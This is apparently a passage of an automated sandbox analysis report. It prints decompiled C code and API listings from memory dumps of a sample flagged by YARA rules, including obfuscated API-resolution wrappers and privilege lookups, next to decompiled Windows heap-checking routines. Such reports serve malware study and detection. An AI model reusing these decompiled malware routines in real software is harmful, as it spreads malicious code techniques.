                      											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
                      											__edx =  *((intOrPtr*)(__esi + 0x2d0));
                      											_t36 = __esi + 0x2e8; // 0x2e8
                      											__eax = _t36;
                      											 *_t36 = _v136;
                      											__eax = _a12;
                      											_t38 = __esi + 0x314; // 0x314
                      											__ebx = _t38;
                      											__ecx = 0;
                      											__eax = _a12 + 0x220;
                      											 *__ebx = 0x18;
                      											 *((intOrPtr*)(__esi + 0x318)) = 0;
                      											 *((intOrPtr*)(__esi + 0x320)) = 0;
                      											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                      											 *((intOrPtr*)(__esi + 0x324)) = 0;
                      											 *((intOrPtr*)(__esi + 0x328)) = 0;
                      											__eax = E00419D10(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
                      											__ecx = 0;
                      											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                      											__eflags = __eax;
                      											if(__eax < 0) {
                      												break;
                      											} else {
                      												__edx = _v132;
                      												_t46 = __esi + 0x2e0; // 0x2e0
                      												__eax = _t46;
                      												 *((intOrPtr*)(__esi + 0x318)) = 0;
                      												 *((intOrPtr*)(__esi + 0x320)) = 0;
                      												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                      												 *((intOrPtr*)(__esi + 0x324)) = 0;
                      												 *((intOrPtr*)(__esi + 0x328)) = 0;
                      												_a12 = _a12 + 0x224;
                      												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
                      												 *__ebx = 0x18;
                      												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
                      												__eax = E00419D50(__edi, _a12 + 0x224, 0x1a, __ebx, _t46);
                      												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                      												__eflags = __eax;
                      												if(__eax < 0) {
                      													break;
                      												} else {
                      													__edx = _a8;
                      													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                      													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                      													__eax = E0041B3F0(__ecx);
                      													__ebx = __eax;
                      													__eax =  *((intOrPtr*)(__ebx + 0x28));
                      													__eax = E0041C0D0(__ebx, __edi,  *((intOrPtr*)(__ebx + 0x28)));
                      													__edx =  *((intOrPtr*)(__ebx + 0x28));
                      													_t61 = __eax + 2; // 0x2
                      													__ecx = __eax + _t61;
                      													__eax =  &_v656;
                      													__eax = E00414A50(__edi,  &_v656, 2, 0); // executed
                      													_pop(__edi);
                      													_pop(__esi);
                      													_pop(__ebx);
                      													__esp = __ebp;
                      													_pop(__ebp);
                      													return __eax;
                      												}
                      											}
                      										}
                      									} else {
                      										goto L13;
                      									}
                      								}
                      							}
                      						}
                      						goto L21;
                      					}
                      					_pop(__edi);
                      					_pop(__esi);
                      					__eax = 0;
                      					__eflags = 0;
                      					_pop(__ebx);
                      					__esp = __ebp;
                      					_pop(__ebp);
                      					return 0;
                      				}
                      				L21:
                      			}

























                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 57%
                      			E00408310(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8, intOrPtr _a57327689) {
                      				char _v67;
                      				char _v68;
                      				void* _t13;
                      				intOrPtr* _t14;
                      				int _t15;
                      				void* _t19;
                      				long _t23;
                      				intOrPtr* _t27;
                      				void* _t28;
                      				void* _t32;
                      
                      				_t32 = __eflags;
                      				_t19 = __ecx;
                      				_v68 = 0;
                      				E0041BE60( &_v67, 0, 0x3f);
                      				_a57327689 = _a57327689 + _t19;
                      				_push(_t19);
                      				E0041CA00();
                      				_t13 = E0040ACF0(__ebx, __edi, _t32, _a4 + 0x1c,  &_v68); // executed
                      				_t14 = E00414E50(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
                      				_t27 = _t14;
                      				if(_t27 != 0) {
                      					_push(__edi);
                      					_t23 = _a8;
                      					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                      					_t34 = _t15;
                      					if(_t15 == 0) {
                      						_t15 =  *_t27(_t23, 0x8003, _t28 + (E0040A480(_t34, 1, 8) & 0x000000ff) - 0x40, _t15);
                      					}
                      					return _t15;
                      				}
                      				return _t14;
                      			}














                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                      • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                      • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                      • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E0041A662(void* __eax, signed int __edi, signed int* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                      				char _t14;
                      
                      				 *__esi =  *__esi & __edi;
                      				_t10 = __eax + 0x18cae608;
                      				asm("in eax, dx");
                      				 *(_t10 - 0x74aa68bb) =  *(__eax + 0x18cae608 - 0x74aa68bb) & _t10;
                      				_t11 = _a4;
                      				_push(__esi);
                      				_t5 = _t11 + 0xc74; // 0xc74
                      				E0041AF60(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                      				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
                      				return _t14;
                      			}





                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: a748f2305e32daf78277a89d9a54a73d4fb5ea3d84165c2add061470d84732b3
                      • Instruction ID: b8837207b3f833786c1b56338df5056352b17a690e064bc72cb588fc55eff48a
                      • Opcode Fuzzy Hash: a748f2305e32daf78277a89d9a54a73d4fb5ea3d84165c2add061470d84732b3
                      • Instruction Fuzzy Hash: C6F0EDB2204215AFD714DFA9CC48EEB37ACEF88314F158559F88897241C630E901CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                      				char _t10;
                      				void* _t15;
                      
                      				_t3 = _a4 + 0xc74; // 0xc74
                      				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                      				return _t10;
                      			}





                      0x0041a67f
                      0x0041a687
                      0x0041a69d
                      0x0041a6a1

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                      				int _t10;
                      				void* _t15;
                      
                      				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                      				return _t10;
                      			}





                      0x0041a7ea
                      0x0041a800
                      0x0041a804

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 30%
                      			E0041A6A4() {
                      				int _v4;
                      				intOrPtr _v8;
                      				signed char _t5;
                      				signed int* _t10;
                      				void* _t14;
                      
                      				asm("stc");
                      				_push(_t5);
                      				asm("ror byte [edx], 0x4a");
                      				asm("pushad");
                      				 *_t10 =  *_t10 | _t5;
                      				_t7 = _v8;
                      				_push(_t15);
                      				E0041AF60(_t14, _v8, _v8 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                      				ExitProcess(_v4);
                      			}









                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: aaf9148e798418c69448c005fec4a4e8fbc40a300ddfeab8d3f4dedd6eb22ea4
                      • Instruction ID: 72afbe6f227dcb582e2e2f1cbc77fcdcecef110db7c557eeae952ed980803967
                      • Opcode Fuzzy Hash: aaf9148e798418c69448c005fec4a4e8fbc40a300ddfeab8d3f4dedd6eb22ea4
                      • Instruction Fuzzy Hash: 1CE04FB16012147BD7218B69CD88FD33FA8DF8A764F048099B54D6F246D274A500C7A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A6B0(intOrPtr _a4, int _a8) {
                      				void* _t10;
                      
                      				_t5 = _a4;
                      				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                      				ExitProcess(_a8);
                      			}




                      0x0041a6b3
                      0x0041a6ca
                      0x0041a6d8

                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                      • Instruction ID: bb9560fde6d34c67ef3b647cdf3193900f81a6514fb9c13ef31c866d6f41cf1e
                      • Opcode Fuzzy Hash: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                      • Instruction Fuzzy Hash: A1B02B718010C0C9F601D7A00F087173A047BC0300F12C011D1020240B4338C080F1B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Strings
                      • The instruction at %p referenced memory at %p., xrefs: 016DB432
                      • The resource is owned exclusively by thread %p, xrefs: 016DB374
                      • an invalid address, %p, xrefs: 016DB4CF
                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016DB314
                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016DB47D
                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016DB39B
                      • The critical section is owned by thread %p., xrefs: 016DB3B9
                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016DB323
                      • Go determine why that thread has not released the critical section., xrefs: 016DB3C5
                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016DB2DC
                      • *** Inpage error in %ws:%s, xrefs: 016DB418
                      • read from, xrefs: 016DB4AD, 016DB4B2
                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016DB2F3
                      • The instruction at %p tried to %s , xrefs: 016DB4B6
                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB3D6
                      • The resource is owned shared by %d threads, xrefs: 016DB37E
                      • a NULL pointer, xrefs: 016DB4E0
                      • *** Resource timeout (%p) in %ws:%s, xrefs: 016DB352
                      • This failed because of error %Ix., xrefs: 016DB446
                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016DB305
                      • *** An Access Violation occurred in %ws:%s, xrefs: 016DB48F
                      • *** enter .cxr %p for the context, xrefs: 016DB50D
                      • <unknown>, xrefs: 016DB27E, 016DB2D1, 016DB350, 016DB399, 016DB417, 016DB48E
                      • write to, xrefs: 016DB4A6
                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016DB476
                      • *** enter .exr %p for the exception record, xrefs: 016DB4F1
                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016DB484
                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016DB53F
                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB38F
                      • *** then kb to get the faulting stack, xrefs: 016DB51C
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                      • API String ID: 0-108210295
                      • Opcode ID: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                      • Instruction ID: 8cb526e7211507becbfeaa21dcd7bf8c743417aa3a3fbf9616589fcdfd72e335
                      • Opcode Fuzzy Hash: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                      • Instruction Fuzzy Hash: D3814335E00210FFDB229E4A8C89DBF3F26AF57A51F4A405CF5065B21ED3628552DBB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 44%
                      			E016E1C06() {
                      				signed int _t27;
                      				char* _t104;
                      				char* _t105;
                      				intOrPtr _t113;
                      				intOrPtr _t115;
                      				intOrPtr _t117;
                      				intOrPtr _t119;
                      				intOrPtr _t120;
                      
                      				_t105 = 0x16048a4;
                      				_t104 = "HEAP: ";
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E0162B150();
                      				} else {
                      					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				_push( *0x171589c);
                      				E0162B150("Heap error detected at %p (heap handle %p)\n",  *0x17158a0);
                      				_t27 =  *0x1715898; // 0x0
                      				if(_t27 <= 0xf) {
                      					switch( *((intOrPtr*)(_t27 * 4 +  &M016E1E96))) {
                      						case 0:
                      							_t105 = "heap_failure_internal";
                      							goto L21;
                      						case 1:
                      							goto L21;
                      						case 2:
                      							goto L21;
                      						case 3:
                      							goto L21;
                      						case 4:
                      							goto L21;
                      						case 5:
                      							goto L21;
                      						case 6:
                      							goto L21;
                      						case 7:
                      							goto L21;
                      						case 8:
                      							goto L21;
                      						case 9:
                      							goto L21;
                      						case 0xa:
                      							goto L21;
                      						case 0xb:
                      							goto L21;
                      						case 0xc:
                      							goto L21;
                      						case 0xd:
                      							goto L21;
                      						case 0xe:
                      							goto L21;
                      						case 0xf:
                      							goto L21;
                      					}
                      				}
                      				L21:
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E0162B150();
                      				} else {
                      					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				_push(_t105);
                      				E0162B150("Error code: %d - %s\n",  *0x1715898);
                      				_t113 =  *0x17158a4; // 0x0
                      				if(_t113 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E0162B150();
                      					} else {
                      						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E0162B150("Parameter1: %p\n",  *0x17158a4);
                      				}
                      				_t115 =  *0x17158a8; // 0x0
                      				if(_t115 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E0162B150();
                      					} else {
                      						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E0162B150("Parameter2: %p\n",  *0x17158a8);
                      				}
                      				_t117 =  *0x17158ac; // 0x0
                      				if(_t117 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E0162B150();
                      					} else {
                      						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E0162B150("Parameter3: %p\n",  *0x17158ac);
                      				}
                      				_t119 =  *0x17158b0; // 0x0
                      				if(_t119 != 0) {
                      					L41:
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E0162B150();
                      					} else {
                      						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					_push( *0x17158b4);
                      					E0162B150("Last known valid blocks: before - %p, after - %p\n",  *0x17158b0);
                      				} else {
                      					_t120 =  *0x17158b4; // 0x0
                      					if(_t120 != 0) {
                      						goto L41;
                      					}
                      				}
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E0162B150();
                      				} else {
                      					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				return E0162B150("Stack trace available at %p\n", 0x17158c0);
                      			}












                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                      • API String ID: 0-2897834094
                      • Opcode ID: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                      • Instruction ID: 0f0c4406279c90ae81d873b17d80fed868cbc8abc9dd52ddac2c303a71fecc6c
                      • Opcode Fuzzy Hash: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                      • Instruction Fuzzy Hash: A761F433592551CFD316AB89DC8CE2173E5EB06E31B5D812EFC0A9B341D63698919F0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E016E4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                      				signed int _v6;
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t189;
                      				intOrPtr _t191;
                      				intOrPtr _t210;
                      				signed int _t225;
                      				signed char _t231;
                      				intOrPtr _t232;
                      				unsigned int _t245;
                      				intOrPtr _t249;
                      				intOrPtr _t259;
                      				signed int _t281;
                      				signed int _t283;
                      				intOrPtr _t284;
                      				signed int _t288;
                      				signed int* _t294;
                      				signed int* _t298;
                      				intOrPtr* _t299;
                      				intOrPtr* _t300;
                      				signed int _t307;
                      				signed int _t309;
                      				signed short _t312;
                      				signed short _t315;
                      				signed int _t317;
                      				signed int _t320;
                      				signed int _t322;
                      				signed int _t326;
                      				signed int _t327;
                      				void* _t328;
                      				signed int _t332;
                      				signed int _t340;
                      				signed int _t342;
                      				signed char _t344;
                      				signed int* _t345;
                      				void* _t346;
                      				signed char _t352;
                      				signed char _t367;
                      				signed int _t374;
                      				intOrPtr* _t378;
                      				signed int _t380;
                      				signed int _t385;
                      				signed char _t390;
                      				unsigned int _t392;
                      				signed char _t395;
                      				unsigned int _t397;
                      				intOrPtr* _t400;
                      				signed int _t402;
                      				signed int _t405;
                      				intOrPtr* _t406;
                      				signed int _t407;
                      				intOrPtr _t412;
                      				void* _t414;
                      				signed int _t415;
                      				signed int _t416;
                      				signed int _t429;
                      
                      				_v16 = _v16 & 0x00000000;
                      				_t189 = 0;
                      				_v8 = _v8 & 0;
                      				_t332 = __edx;
                      				_v12 = 0;
                      				_t414 = __ecx;
                      				_t415 = __edx;
                      				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                      					L88:
                      					_t416 = _v16;
                      					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                      						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                      						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                      							L107:
                      							return 1;
                      						}
                      						_t191 =  *[fs:0x30];
                      						__eflags =  *(_t191 + 0xc);
                      						if( *(_t191 + 0xc) == 0) {
                      							_push("HEAP: ");
                      							E0162B150();
                      						} else {
                      							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      						}
                      						_push(_v12);
                      						_push( *((intOrPtr*)(_t332 + 0x30)));
                      						_push(_t332);
                      						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                      						L122:
                      						E0162B150();
                      						L119:
                      						return 0;
                      					}
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push("HEAP: ");
                      						E0162B150();
                      					} else {
                      						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					_push(_t416);
                      					_push( *((intOrPtr*)(_t332 + 0x2c)));
                      					_push(_t332);
                      					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                      					goto L122;
                      				} else {
                      					goto L1;
                      				}
                      				do {
                      					L1:
                      					 *_a16 = _t415;
                      					if( *(_t414 + 0x4c) != 0) {
                      						_t392 =  *(_t414 + 0x50) ^  *_t415;
                      						 *_t415 = _t392;
                      						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                      						_t424 = _t392 >> 0x18 - _t352;
                      						if(_t392 >> 0x18 != _t352) {
                      							_push(_t352);
                      							E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                      						}
                      					}
                      					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                      						_t210 =  *[fs:0x30];
                      						__eflags =  *(_t210 + 0xc);
                      						if( *(_t210 + 0xc) == 0) {
                      							_push("HEAP: ");
                      							E0162B150();
                      						} else {
                      							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      						}
                      						_push(_v8 & 0x0000ffff);
                      						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                      						__eflags = _t340;
                      						_push(_t340);
                      						E0162B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                      						L117:
                      						__eflags =  *(_t414 + 0x4c);
                      						if( *(_t414 + 0x4c) != 0) {
                      							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                      							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      							__eflags =  *_t415;
                      						}
                      						goto L119;
                      					}
                      					_t225 =  *_t415 & 0x0000ffff;
                      					_t390 =  *(_t415 + 2);
                      					_t342 = _t225;
                      					_v8 = _t342;
                      					_v20 = _t342;
                      					_v28 = _t225 << 3;
                      					if((_t390 & 0x00000001) == 0) {
                      						__eflags =  *(_t414 + 0x40) & 0x00000040;
                      						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                      						__eflags = _t344 & 0x00000001;
                      						if((_t344 & 0x00000001) == 0) {
                      							L66:
                      							_t345 = _a12;
                      							 *_a8 =  *_a8 + 1;
                      							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                      							__eflags =  *_t345;
                      							L67:
                      							_t231 =  *(_t415 + 6);
                      							if(_t231 == 0) {
                      								_t346 = _t414;
                      							} else {
                      								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                      							}
                      							if(_t346 != _t332) {
                      								_t232 =  *[fs:0x30];
                      								__eflags =  *(_t232 + 0xc);
                      								if( *(_t232 + 0xc) == 0) {
                      									_push("HEAP: ");
                      									E0162B150();
                      								} else {
                      									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      								}
                      								_push( *(_t415 + 6) & 0x000000ff);
                      								_push(_t415);
                      								_push("Heap block at %p has incorrect segment offset (%x)\n");
                      								goto L95;
                      							} else {
                      								if( *((char*)(_t415 + 7)) != 3) {
                      									__eflags =  *(_t414 + 0x4c);
                      									if( *(_t414 + 0x4c) != 0) {
                      										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                      										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      										__eflags =  *_t415;
                      									}
                      									_t415 = _t415 + _v28;
                      									__eflags = _t415;
                      									goto L86;
                      								}
                      								_t245 =  *(_t415 + 0x1c);
                      								if(_t245 == 0) {
                      									_t395 =  *_t415 & 0x0000ffff;
                      									_v6 = _t395 >> 8;
                      									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
